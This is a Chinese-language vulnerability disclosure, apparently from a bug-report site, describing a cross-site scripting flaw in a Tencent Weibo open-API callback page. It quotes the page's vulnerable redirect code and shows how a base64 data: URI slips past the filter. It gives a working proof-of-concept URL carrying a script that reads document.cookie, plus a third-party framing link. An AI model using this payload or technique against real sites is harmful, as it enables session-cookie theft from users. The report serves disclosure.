腾讯某接口示例XSS跨站可打cookies

firefox测试最终效果，提示授权失败，然后等待3秒跳转，弹出cookie:

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1

框架调用:http://qz6666.com/2.html

漏洞页面源码:

code 区域

<script src="//mat1.gtimg.com/app/openjs/openjs.js#autoboot=no&amp;debug=yes"></script>

<script>



(function () {



    var hashpos = location.href.lastIndexOf('#'),



        search = location.search || '',

    

        returnto = search.match(/return_to=([^&^#]+)/),



        appkey = search.match(/appkey=([^&^#]+)/);

        

    function jumpto(uri,timeout) { // 网址跳转



        setTimeout(function () {



            location.href = uri;



        }, timeout * 1000);



    }



    if (!returnto) {



        document.write('缺少return_to参数');



        return;



    } else if (!appkey) {



        document.write('缺少appkey参数');



        return;



    } else if (hashpos == -1) {



        document.write('获取授权信息失败');



        return;

    }



    if (hashpos != -1) {

    

        try {



            QQWB.bigtable.set("base","appkey",appkey[1]); // 设置appkey，未公开方法



            QQWB.auth.logout(); // 先清除之前的授权信息

    

            QQWB._token.resolveResponse(location.href.slice(hashpos+1),false); // 解析并保存授权结果

    

        } catch (resolveResultException) {

    

            document.write('解析授权信息失败，' + resolveResultException); // 解析失败



            return;

        }

    

        if (QQWB.loginStatus()) {

    

            document.write('授权成功，页面跳转中，<a target="_self" href="' + returnto[1] +'">立即跳转</a>' );



            jumpto(returnto[1],3);



        } else {



            document.write('授权失败，页面跳转中，<a target="_self" href="' + returnto[1] +'">立即跳转</a>' );



            jumpto(returnto[1],3);

    

        }

    

    }



}());

</script>

由上不难看出，会先判断returnto，appkey，hashpos这3个参数，前两个不为空，后一个不为-1，简单构造即可满足条件。至于解析授权信息这里，开始测试的时候随便填值就过了，重点是openjs.js没看懂。。。

url的参数过滤，对data:;base64,这种形式也只判断了固定的字符串，base64字符串开头随便加些字符并不影响结果,这里转换一下即可:

code 区域

11111111<script>alert(document.cookie)</script>

MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1

漏洞证明：

firefox测试最终效果，提示授权失败，然后等待3秒跳转，弹出cookie:

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1

框架调用:http://qz6666.com/2.html